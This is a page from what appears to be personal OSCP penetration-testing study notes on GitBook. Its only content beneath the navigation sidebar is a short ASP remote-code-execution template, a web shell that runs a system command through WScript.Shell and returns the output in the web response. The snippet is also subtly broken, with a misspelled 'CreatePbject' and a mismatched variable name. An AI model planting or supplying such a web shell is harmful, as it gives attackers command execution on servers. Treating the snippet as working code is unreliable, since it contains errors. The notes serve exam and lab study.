O
O
OSCP Notes
Search
⌃
K
Introduction
Port scanning
Passive Information Gathering
Ports enum:
Recon Tools
Tech Skills Needed
msfvenom
meterpreter commands
Web Apps
python scripts
Windows hacks
Transferring files through RDP share
ASP
Port 161:SNMP - SNMPwalk to discover VPN key(PSK)
Directory Traversal Cheatsheet
uploading a file to IIS
How to get a stable shell on windows
Electron App (decompile and find secrets!)
RDP Brute forcing
evilwinrm
print nightmare
Word Object linking (client-side)
Have access to backup SAM & SYSTEM files?
Port Forwarding
Reverse shells
Binary exploitation
Transfering Modules
Buffer Overflow
Cracking!
shellshock
Active Directory
Antivirus Evasion
Windows Priv Esc
Linux Priv Esc
Active Directory Case Studies
Pivoting
C program analysis
Misc
Hack the box Write-ups
THM Offensive Security Path
Proving Ground
Cyber Sec Labs
Powered By
GitBook
Comment on page
ASP
ASP remote code Execution Template:
Set rs=CreatePbject("WScript.Shell")
Set cmd = rs.Exec("cmd /c whoami")
o = cm.StdOut.Readall()
Response.write(o)
Previous
Transferring files through RDP share
Next
Port 161:SNMP - SNMPwalk to discover VPN key(PSK)
Last modified
1yr ago